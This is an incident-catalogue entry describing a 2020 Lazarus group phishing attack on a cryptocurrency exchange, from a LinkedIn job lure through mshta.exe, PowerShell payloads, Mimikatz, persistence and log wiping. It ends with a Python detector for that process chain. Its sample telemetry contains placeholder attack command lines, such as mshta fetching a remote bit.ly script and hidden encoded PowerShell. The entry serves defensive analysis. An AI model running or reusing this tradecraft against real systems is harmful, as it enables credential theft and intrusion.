Cyber Incident Victim: Cryptocurrency exchange
Date: Aug 2020
Location: United States of America
Summary
The Lazarus group, a North Korean advanced persistent threat actor, targeted a cryptocurrency exchange through a LinkedIn phishing campaign impersonating a blockchain company's job opportunity. A system administrator received a malicious Microsoft Word document whose contents were presented as GDPR-protected; its macros launched mshta.exe to fetch a VBScript from a bit.ly link, establishing command-and-control communication and retrieving PowerShell payloads. The attackers used custom loaders, credential-harvesting tools such as Mimikatz aimed at financial data, and registry manipulation via schtasks to maintain persistence, and attempted to erase evidence by deleting security logs. The operation aimed to compromise cryptocurrency wallets and expand infiltration across the sector's supply chain.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 3 techniques |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
On August 25, 2020, cybersecurity researchers from F-Secure disclosed a targeted attack by the Lazarus group against a cryptocurrency organization. The attack began with a phishing campaign exploiting LinkedIn job advertisements. A system administrator received a malicious Microsoft Word document via their personal LinkedIn account, purportedly from a blockchain technology company seeking candidates with the employee’s skills. The document claimed GDPR compliance required enabling macros to view its contents. Once macros were enabled, the document executed a .LNK file that launched mshta.exe to access a bit.ly link hosting a VBScript. This script performed system reconnaissance and transmitted operational data to a command-and-control (C2) server, which subsequently delivered PowerShell scripts to fetch Lazarus malware payloads. The attack leveraged phishing techniques consistent with previously identified Lazarus samples, including matching document metadata such as author names and word counts.

The malware deployed included a custom portable executable (PE) loader injected into the lsass.exe process as a security package, modifying registry keys via the schtasks utility. Lazarus used a tailored version of Mimikatz to harvest credentials, specifically targeting financial assets such as cryptocurrency wallets and online banking accounts. Additional malware variants, such as LSSVC.dll, provided backdoor connections to other hosts, enabling arbitrary command execution, in-memory data decompression, and secondary payload downloads. The group attempted to evade detection by deleting security event logs and other forensic artifacts. F-Secure attributed the campaign to Lazarus based on technical overlaps with historical attacks, including the WannaCry ransomware, the Bangladesh Bank heist, and the 2018 HaoBao Bitcoin theft. The incident impacted organizations across 14 countries, including the UK and US. Researchers assessed that Lazarus would continue targeting cryptocurrency entities because of their profitability and might expand operations to compromise supply chain components within the sector.
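As an added example (not code from F-Secure's report or from this catalogue), the following Python flags the execution chain described above (an Office document leading, via the LNK/cmd hop, to mshta.exe with a remote URL and then a hidden PowerShell stage) over constructed, Sysmon-style process-creation events. The field layout, file paths, and the bit.ly and PowerShell arguments are assumptions or placeholders, not indicators from the report.

```python
import re
from typing import NamedTuple

class ProcEvent(NamedTuple):  # subset of Sysmon Event ID 1 fields; layout assumed
    pid: int
    ppid: int
    image: str
    cmdline: str

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://\S+", re.I)

# Constructed sample telemetry modelled on the chain described above; the bit.ly
# path and the encoded PowerShell argument are placeholders, not real indicators.
SAMPLE = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", r'"WINWORD.EXE" /n "C:\Users\sysadmin\Downloads\Job_Offer.docx"'),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c start lure.lnk"),
    ProcEvent(400, 300, r"C:\Windows\System32\mshta.exe", "mshta.exe https://bit.ly/PLACEHOLDER"),
    ProcEvent(500, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -nop -w hidden -enc PLACEHOLDER"),
    ProcEvent(600, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
]

def name(path): return path.rsplit("\\", 1)[-1].lower()

def lineage(events, pid):
    """Image names from the given process up to its root ancestor (loop-safe)."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain

def detect(events):
    """Return (rule, pid) pairs for events matching the described chain."""
    hits = []
    for e in events:
        img, ancestors = name(e.image), lineage(events, e.ppid)
        # Script host anywhere below an Office process (covers the LNK/cmd hop).
        if img in SCRIPT_HOSTS and any(a in OFFICE for a in ancestors): hits.append(("script_host_under_office", e.pid))
        # mshta.exe handed a remote URL on its command line (the bit.ly stage).
        if img == "mshta.exe" and URL_RE.search(e.cmdline): hits.append(("mshta_remote_url", e.pid))
        # Hidden-window PowerShell launched beneath mshta.exe (payload retrieval).
        if img == "powershell.exe" and "mshta.exe" in ancestors and "-w hidden" in e.cmdline.lower(): hits.append(("powershell_from_mshta_hidden", e.pid))
    return hits
```

Running `detect(SAMPLE)` reports the mshta.exe and powershell.exe events and leaves the benign explorer.exe and notepad.exe events untouched; `lineage(SAMPLE, pid)` reconstructs the parent chain for triage.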
